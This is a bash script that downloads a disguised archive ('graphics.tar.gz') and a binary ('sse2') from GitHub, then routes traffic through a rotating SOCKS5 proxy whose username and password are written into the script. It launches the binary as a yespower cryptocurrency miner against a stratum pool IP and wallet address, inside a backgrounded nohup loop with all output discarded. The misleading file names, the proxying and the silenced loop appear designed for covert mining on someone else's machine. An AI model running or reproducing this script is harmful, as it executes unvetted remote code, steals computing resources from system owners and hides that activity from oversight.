#!/bin/bash
wget https://github.com/Akatsoki/joss/raw/main/graphics.tar.gz
tar -xvzf graphics.tar.gz

cat > graftcp/local/graftcp-local.conf <<END

listen = :2233

loglevel = 1

socks5 = p.webshare.io:80

socks5_username = zqcfzunl-GB-rotate

socks5_password = gvoadw0ov5f2

END

./graftcp/local/graftcp-local -config graftcp/local/graftcp-local.conf &

sleep .2

echo " "

echo " "

wget https://github.com/Akatsoki/nungx/raw/main/sse2
chmod +x sse2

wallet="./graftcp/graftcp ./sse2 -a yespower -o stratum+tcps://146.59.217.34:17017 -u web1qxnm9q7txetqj6uzxat4xkas6rxr93q5fc7xjm4.GEDO -t 15 "
nohup $(for i in {1..999}; do $(echo $wallet); done) >/dev/null 2>&1
